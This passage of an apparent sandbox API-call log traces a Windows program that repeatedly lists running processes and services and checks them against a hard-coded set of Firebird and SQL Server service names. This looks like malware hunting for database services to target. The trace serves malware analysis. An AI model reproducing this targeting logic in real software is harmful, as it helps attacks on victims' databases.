4 [0306.429] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0306.429] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0306.429] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0306.429] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0306.429] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0306.429] lstrlenW (lpString="ShellHWDetection") returned 16 [0306.429] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0306.429] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0306.429] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0306.429] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0306.429] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0306.429] lstrlenW (lpString="Spooler") returned 7 [0306.429] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0306.430] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0306.430] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0306.430] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0306.430] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0306.430] lstrlenW (lpString="StateRepository") returned 15 [0306.430] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0306.430] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0306.430] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0306.430] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0306.430] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0306.430] lstrlenW (lpString="SysMain") returned 7 [0306.430] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0306.430] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0306.430] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0306.430] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0306.430] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0306.430] lstrlenW (lpString="SystemEventsBroker") returned 18 [0306.430] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0306.430] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0306.430] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0306.430] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0306.430] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0306.430] lstrlenW (lpString="Themes") returned 6 [0306.431] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0306.431] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0306.431] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0306.431] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0306.431] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0306.431] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0306.431] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0306.431] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0306.431] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0306.431] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0306.431] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0306.431] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0306.431] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0306.431] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0306.431] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0306.431] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0306.431] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4150d60 | out: hHeap=0x470000) returned 1 [0306.432] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x530 [0307.107] Process32FirstW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0307.108] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0307.109] lstrlenW (lpString="System") returned 6 [0307.109] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0307.110] lstrlenW (lpString="smss.exe") returned 8 [0307.110] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0307.111] lstrlenW (lpString="csrss.exe") returned 9 [0307.111] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0307.112] lstrlenW (lpString="wininit.exe") returned 11 [0307.112] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0307.113] lstrlenW (lpString="csrss.exe") returned 9 [0307.113] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0307.114] lstrlenW (lpString="winlogon.exe") returned 12 [0307.114] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0307.115] lstrlenW (lpString="services.exe") returned 12 [0307.115] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0307.116] lstrlenW (lpString="lsass.exe") returned 9 [0307.116] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0307.117] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0307.117] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0307.118] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0307.118] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.119] lstrlenW (lpString="svchost.exe") returned 11 [0307.119] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.120] lstrlenW (lpString="svchost.exe") returned 11 [0307.120] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0307.121] lstrlenW (lpString="dwm.exe") returned 7 [0307.121] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.122] lstrlenW (lpString="svchost.exe") returned 11 [0307.122] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.123] lstrlenW (lpString="svchost.exe") returned 11 [0307.123] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.124] lstrlenW (lpString="svchost.exe") returned 11 [0307.124] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.125] lstrlenW (lpString="svchost.exe") returned 11 [0307.125] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.126] lstrlenW (lpString="svchost.exe") returned 11 [0307.127] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.128] lstrlenW (lpString="svchost.exe") returned 11 [0307.128] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.129] lstrlenW (lpString="svchost.exe") returned 11 [0307.129] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.130] lstrlenW (lpString="svchost.exe") returned 11 [0307.130] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.130] lstrlenW (lpString="svchost.exe") returned 11 [0307.131] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.132] lstrlenW (lpString="svchost.exe") returned 11 [0307.132] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0307.133] lstrlenW (lpString="spoolsv.exe") returned 11 [0307.133] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.134] lstrlenW (lpString="svchost.exe") returned 11 [0307.134] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0307.135] lstrlenW (lpString="audiodg.exe") returned 11 [0307.135] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0307.136] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0307.136] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0307.137] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0307.137] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0307.723] lstrlenW (lpString="Memory Compression") returned 18 [0307.723] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0307.724] lstrlenW (lpString="sihost.exe") returned 10 [0307.724] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.725] lstrlenW (lpString="svchost.exe") returned 11 [0307.725] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0307.726] lstrlenW (lpString="taskhostw.exe") returned 13 [0307.726] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x39, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0307.727] lstrlenW (lpString="explorer.exe") returned 12 [0307.727] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0307.728] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0307.728] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0307.729] lstrlenW (lpString="SearchUI.exe") returned 12 [0307.729] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0307.730] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0307.730] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0307.731] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0307.731] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0307.732] lstrlenW (lpString="wdgmug.exe") returned 10 [0307.732] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0307.732] lstrlenW (lpString="cmd.exe") returned 7 [0307.732] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0307.733] lstrlenW (lpString="conhost.exe") returned 11 [0307.733] Process32NextW (in: hSnapshot=0x530, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0307.734] CloseHandle (hObject=0x530) returned 1 [0307.734] Sleep (dwMilliseconds=0x1f4) [0308.475] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a4e0 [0308.476] EnumServicesStatusExW (in: hSCManager=0x401a4e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0308.477] GetLastError () returned 0xea [0308.477] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c30) returned 0x4150d60 [0308.478] EnumServicesStatusExW (in: hSCManager=0x401a4e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4150d60, cbBufSize=0x1c30, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4150d60, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0308.479] CloseServiceHandle (hSCObject=0x401a4e0) returned 1 [0308.479] lstrlenW (lpString="Appinfo") returned 7 [0308.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0308.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0308.480] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0308.480] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0308.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0308.480] lstrlenW (lpString="AppXSvc") returned 7 [0308.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0308.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0308.480] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0308.480] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0308.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0308.480] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0308.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0308.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0308.480] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0308.480] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0308.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0308.480] lstrlenW (lpString="Audiosrv") returned 8 [0308.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0308.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0308.480] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0308.480] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0308.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0308.480] lstrlenW (lpString="BFE") returned 3 [0308.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0308.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0308.481] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0308.481] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0308.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0308.481] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0308.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0308.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0308.481] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0308.481] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0308.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0308.481] lstrlenW (lpString="CDPSvc") returned 6 [0308.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0308.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0308.481] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0308.481] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0308.481] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0308.481] lstrlenW (lpString="ClickToRunSvc") returned 13 [0308.481] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0308.481] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0308.481] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0308.481] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0308.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0308.482] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0308.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0308.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0308.482] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0308.482] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0308.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0308.482] lstrlenW (lpString="CryptSvc") returned 8 [0308.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0308.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0308.482] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0308.482] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0308.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0308.482] lstrlenW (lpString="DcomLaunch") returned 10 [0308.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0308.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0308.482] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0308.482] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0308.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0308.482] lstrlenW (lpString="DeviceAssociationService") returned 24 [0308.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", 